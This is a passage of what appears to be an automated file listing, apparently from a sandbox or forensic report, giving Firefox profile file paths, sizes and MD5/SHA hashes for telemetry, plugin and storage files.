SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\AlternateServices.bin
Filesize13KB
MD57f139e0aadd5a56b0d2aeb5237a67e59
SHA14ff82ac52135090d3010810079aa7ee68d2c42b7
SHA256ff8dcd2b7c29100f750ff091551545f2d32c1a0d6813016b2d202120cac31e72
SHA51247201dc27a2335cf45fee3e45fe5dc0db7a4b0dfb34df112441b0e98924fefffbda0e9522caed7af3d7037058900a3e0bad1673860bfa1f442f22198ff79a389
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\AlternateServices.bin
Filesize7KB
MD5e400515a2f284bfee71b27c3e87e3d9a
SHA159a73683a5195d0081334c2f441694a111b17d76
SHA2565d50967c380d48dd47b6edf2842af67066582e260105098dfa10ef7b98e77df5
SHA512ddde3ab678c0d1f72c75dc4671613f1d5c26944e954d1490918f0270ce60f3a109e62602baa37273485c85e20c71b672257fe34eeab712241fb355aec726092b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5337dc16fbeb79ac2075516cc26f890e0
SHA1e22c542995cf84288d3b963b4c7da4ca7c405839
SHA2563c5f998b9630b9b2be8816d73b7f988f2e5f28e68f062831e939f27f432c582c
SHA5127a20d02b50b18dc70ab7366f03791f3a5d2a9b890e6cf8a5b6a0f007f6ebb2a0db974f294d04957f4d5c206c5ec6c4bcc0ebd7750694a937d70824d76f18cba5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5f6d2125eb0cf05822b6ffa9b6d0730e0
SHA18e7b1a731d496419adb967e70d0293f869755196
SHA2566e249f5c71a29f6aa3f04fb3ff00aae616fcfbadf169f34e19c5fcc6ac9b96f8
SHA512445af685ffd94e5be5f1c7d179a9c227fd3be15ea7ebeae29ac9547a93351416862658b6387c380a3066e5b2b5b0f179566ba8f4757ba3e3354fcecd9384daa7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\datareporting\glean\pending_pings\3baf9ab9-138e-476c-a26b-24b0b2397e58
Filesize28KB
MD590de5619d2bfb0ea3b5b80f66a999f8d
SHA1f4c98968eb0e5c971755fa777ba778854d3f5c90
SHA256dad7840c50a7f12021d801868ac3145117932784f63ef4c5dee94333d2ff188d
SHA5128e5bfec47124161e2c6775a35859b46e7713211e2767dccfa2e578a7b3a1708b85dd73adc6ac66fcae72962b1d84791061752a61902a7e120d0ec08b800b6d87
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\datareporting\glean\pending_pings\b0f6755b-2254-42ab-9338-121114d25fd9
Filesize671B
MD54a9b3b95af74f7afb0c691ad807dedca
SHA19e3b7e3f6d3d306a8dc1324c3b19bd2b348d9e26
SHA256799f796f432d5af451b2c31305f728c28398aba14da43a1bca58c8ecee6c3004
SHA512cc4a1bb7307034074a62f24e6150f8d4f4a3c4723d54ef38b6fa54c65934f38b450a2119dd71c8ee77e5fd868651f2af66de3b0d8c97c4752c5ee45e24fbd5f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\datareporting\glean\pending_pings\c2217835-300b-466e-a743-6dba94b0f2c8
Filesize982B
MD5eb5fa9b6400be9d45943807e07acd778
SHA1891a38e3b79b7a4fbb1191e8f4693c3072d56cf5
SHA256f1167fb946a892f421d6581fa5623f75175abc9fb87fff14457137304df353c9
SHA5126d3709648da05a61d97e554e83ee3b62d622556162eea3be46f34333a40c8c129a06c51c497e18e6de93eb0e7066a2feef3934618a9858936d13aa15ad583973
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD5298d0780805611128233ec310eb94e96
SHA1a66db9a996fdb55a7a246ac03b7752529f14c421
SHA256627018586ee7b6567ddc045d5197f317d903157b90f4ab72a9dac0b498e74ca8
SHA512f6f226f85132aefb81549fe01d256680aca1014da094cf831f173f8bd061bbced7d5f5a37b343a5835184f56ea0c0c0ab58d31c959e8698bea1390ebf897f894
-
Filesize
14KB
MD58fa889566b41f5c57d4a98c16bec0522
SHA1401dccd29f332961faf433b0d820739c3d8c2b2d
SHA256adc0360d17f670c74f85dca5e808faef3efcb176300005c91ae9895f19722ae4
SHA512eb4c4d19c7b0da458dc03edc7f94604291fa4ce9e5e5338c5f31a016b19c9faf4449d5973c391cfe781e802decfab0c5982c48c8f53787bad3d7705611af4794
-
Filesize
9KB
MD5c4dfe7ed91771a1267e896bb0ad1323b
SHA1ca117a88b5b3f052594c3e254356505fc86cf3f8
SHA256b28f558e0dbb560e5aa964f21b323d04062ff819a005e9d7d993fda0a5d1ad58
SHA512915b58d981561188e740994bde0347bc273f00fc0c70663f78b4b3035979325c5cd86f89313db29093bc5c07a49952932a836c73888f97daef3d4cc0d8ba1a08
-
Filesize
10KB
MD54e4471ba1ca89f7786bcebfe2cda36c7
SHA16c8ef44f76435561e5cdb35d1ee0fabe83885f40
SHA256575a5313a73e13159be5669b1c4e9ed4cdd96ff435172682b92d71835d3a3215
SHA5126fbf99a525768c0c29191348c3a24d9086f3788d988ee17137054eb05d5a5b29e16a3f746bb17dfd71e2f94f0214614329f4a9672fee225b28c2d6c50485ff45
-
Filesize
9KB
MD5e303330cca9d3b5b32ea9df58f050c0b
SHA1cfadbab20801b651a75b0165b797616e2d7c2d46
SHA2566609a3e69eb0c143af599dad6e2a1331823b790e2a80b232719430650e141e2f
SHA512504c543fcbe926da25a954bdfadd6a0ef419e3918ae5a71abb7b70d6b5407578ff1a4f46e0835984ff8cfb41b6282074e563c1dac819c2939dc723d9c3934c04
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize9.5MB
MD503b91ce57330d2a5f07cb9e304e66ddd
SHA1bb3686938297160f1edd077943220b77d0c334e1
SHA25625d4add6eea928a087d2c0c370bf5c625f41a9c3e077d671a9a0ab5375067075
SHA512858c99eb01ad679a61bef17ea2557e4671191dfda078a6c8d487672dd9b5d986510c5b6656a3e65aa8348fb7aee8927397168226e2ad2af06d6196d4a1ea28f1